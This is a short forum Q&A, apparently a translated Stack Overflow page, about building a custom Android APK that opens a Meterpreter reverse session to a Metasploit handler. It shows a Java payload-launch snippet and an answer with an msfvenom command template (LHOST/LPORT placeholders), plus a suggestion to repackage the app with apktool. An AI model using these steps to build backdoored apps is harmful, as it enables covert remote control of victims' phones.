1

我试图创建一个自定义的 android apk 以在 metasploit 上打开一个 Meterpreter shell 会话,但它不起作用。

它连接到 metasploit 处理程序,但我没有meterpreter shell。

public static void startAsync() {
        new Thread() {
            @Override
            public void run() {
                // Execute the payload
                Payload.main(null);
            }
        }.start();
    }

。开始()

不在代码中。

有人有完整的工作代码吗?

原始代码

4

1 回答 1

1

You can create an app with msfvenom to create the base and then decompile it with a program like apktool and make changes to that app

msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk
于 2016-12-19T19:15:47.963 回答